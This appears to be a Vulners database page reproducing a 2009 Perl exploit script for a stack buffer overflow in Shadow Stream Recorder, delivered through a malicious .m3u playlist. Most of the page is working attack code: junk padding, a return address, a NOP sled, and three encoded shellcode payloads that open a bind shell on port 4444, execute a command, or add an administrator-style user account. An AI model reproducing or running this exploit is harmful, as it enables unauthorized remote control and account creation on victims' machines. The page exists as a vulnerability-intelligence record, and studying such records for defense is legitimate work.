Vulners
Lucene search
Shadow Stream Recorder (.m3u file) Universal Stack Overflow Exploit
===================================================================
Shadow Stream Recorder (.m3u file) Universal Stack Overflow Exploit
===================================================================
#!/usr/bin/perl
# Shadow Stream Recorder (.m3u file) Local Universal Stack Overflow Exploit
# By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz
# Made in Tunisia
###########
# program : Shadow Stream Recorder
##########
# Exploit In Action :
#[!] usage :
# ./sploit.pl bindshell
# ./sploit.pl cmdexec
# ./sploit.pl adduser
##########
# C:\>sploit.pl bindshell
#[!] Done
# C:\>nc localhost 4444
# Console - Windows Trust 3.0 (Service Pack 3: v5512)
#
#(C) 1985-2008 Microsoft Corp.
# Everything Tested Under Windows XP SP3 FR
# After Creating The File just open the program & drag and drop m3u evil file ! :)
sub help {print "[!] usage : \n ./sploit.pl bindshell \n ./sploit.pl cmdexec \n ./sploit.pl adduser \n " ;exit();}
&help
unless $ARGV[0];
my $sploit = $ARGV[0];
my $junk = "http://"."A" x 26117;
my $ret = "\x63\x46\x92\x7C";
my $nope = "\x90" x 30;
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
my $calc_shellcode =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
"\xac\x2c\xc9\x40" ;
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $bindshell =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x69".
"\x45\x3b\x07\x83\xeb\xfc\xe2\xf4\x95\x2f\xd0\x4a\x81\xbc\xc4\xf8".
"\x96\x25\xb0\x6b\x4d\x61\xb0\x42\x55\xce\x47\x02\x11\x44\xd4\x8c".
"\x26\x5d\xb0\x58\x49\x44\xd0\x4e\xe2\x71\xb0\x06\x87\x74\xfb\x9e".
"\xc5\xc1\xfb\x73\x6e\x84\xf1\x0a\x68\x87\xd0\xf3\x52\x11\x1f\x2f".
"\x1c\xa0\xb0\x58\x4d\x44\xd0\x61\xe2\x49\x70\x8c\x36\x59\x3a\xec".
"\x6a\x69\xb0\x8e\x05\x61\x27\x66\xaa\x74\xe0\x63\xe2\x06\x0b\x8c".
"\x29\x49\xb0\x77\x75\xe8\xb0\x47\x61\x1b\x53\x89\x27\x4b\xd7\x57".
"\x96\x93\x5d\x54\x0f\x2d\x08\x35\x01\x32\x48\x35\x36\x11\xc4\xd7".
"\x01\x8e\xd6\xfb\x52\x15\xc4\xd1\x36\xcc\xde\x61\xe8\xa8\x33\x05".
"\x3c\x2f\x39\xf8\xb9\x2d\xe2\x0e\x9c\xe8\x6c\xf8\xbf\x16\x68\x54".
"\x3a\x16\x78\x54\x2a\x16\xc4\xd7\x0f\x2d\x2a\x5b\x0f\x16\xb2\xe6".
"\xfc\x2d\x9f\x1d\x19\x82\x6c\xf8\xbf\x2f\x2b\x56\x3c\xba\xeb\x6f".
"\xcd\xe8\x15\xee\x3e\xba\xed\x54\x3c\xba\xeb\x6f\x8c\x0c\xbd\x4e".
"\x3e\xba\xed\x57\x3d\x11\x6e\xf8\xb9\xd6\x53\xe0\x10\x83\x42\x50".
"\x96\x93\x6e\xf8\xb9\x23\x51\x63\x0f\x2d\x58\x6a\xe0\xa0\x51\x57".
"\x30\x6c\xf7\x8e\x8e\x2f\x7f\x8e\x8b\x74\xfb\xf4\xc3\xbb\x79\x2a".
"\x97\x07\x17\x94\xe4\x3f\x03\xac\xc2\xee\x53\x75\x97\xf6\x2d\xf8".
"\x1c\x01\xc4\xd1\x32\x12\x69\x56\x38\x14\x51\x06\x38\x14\x6e\x56".
"\x96\x95\x53\xaa\xb0\x40\xf5\x54\x96\x93\x51\xf8\x96\x72\xc4\xd7".
"\xe2\x12\xc7\x84\xad\x21\xc4\xd1\x3b\xba\xeb\x6f\x99\xcf\x3f\x58".
"\x3a\xba\xed\xf8\xb9\x45\x3b\x07";
# win32_adduser - PASS=alphanix EXITFUNC=seh USER=nullarea Size=244 Encoder=PexFnstenvSub http://metasploit.com
my $add_user =
"\x2b\xc9\x83\xe9\xc9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xca".
"\x75\xb1\x0a\x83\xeb\xfc\xe2\xf4\x36\x9d\xf5\x0a\xca\x75\x3a\x4f".
"\xf6\xfe\xcd\x0f\xb2\x74\x5e\x81\x85\x6d\x3a\x55\xea\x74\x5a\x43".
"\x41\x41\x3a\x0b\x24\x44\x71\x93\x66\xf1\x71\x7e\xcd\xb4\x7b\x07".
"\xcb\xb7\x5a\xfe\xf1\x21\x95\x0e\xbf\x90\x3a\x55\xee\x74\x5a\x6c".
"\x41\x79\xfa\x81\x95\x69\xb0\xe1\x41\x69\x3a\x0b\x21\xfc\xed\x2e".
"\xce\xb6\x80\xca\xae\xfe\xf1\x3a\x4f\xb5\xc9\x06\x41\x35\xbd\x81".
"\xba\x69\x1c\x81\xa2\x7d\x5a\x03\x41\xf5\x01\x0a\xca\x75\x3a\x62".
"\xf6\x2a\x80\xfc\xaa\x23\x38\xf2\x49\xb5\xca\x5a\xa2\x85\x3b\x0e".
"\x95\x1d\x29\xf4\x40\x7b\xe6\xf5\x2d\x16\xdc\x6e\xe4\x10\xc9\x6f".
"\xea\x5a\xd2\x2a\xa4\x10\xc5\x2a\xbf\x06\xd4\x78\xea\x1b\xc4\x66".
"\xa6\x14\xc3\x6f\xab\x55\xd0\x66\xba\x1d\xd0\x64\xa3\x0d\x91\x25".
"\x8b\x31\xf5\x2a\xec\x53\x91\x64\xaf\x01\x91\x66\xa5\x16\xd0\x66".
"\xad\x07\xde\x7f\xba\x55\xf0\x6e\xa7\x1c\xdf\x63\xb9\x01\xc3\x6b".
"\xbe\x1a\xc3\x79\xea\x1b\xc4\x66\xa6\x14\xc3\x6f\xab\x55\x9e\x4b".
"\x8e\x31\xb1\x0a";
if ($sploit eq 'bindshell')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$bindshell;close(file);print "[!] Done \n";}
elsif ($sploit eq 'cmdexec')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$calc_shellcode;close(file);print "[!] Done \n"}
elsif ($sploit eq 'adduser')
{open(file,'>Exploit.m3u');print file $junk.$ret.$nope.$add_user;close(file);print "[!] Done \n"}
else {&help}
# 0day.today [2018-02-21] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Apr 2009 00:00Current
6.8Medium risk
Vulners AI Score6.8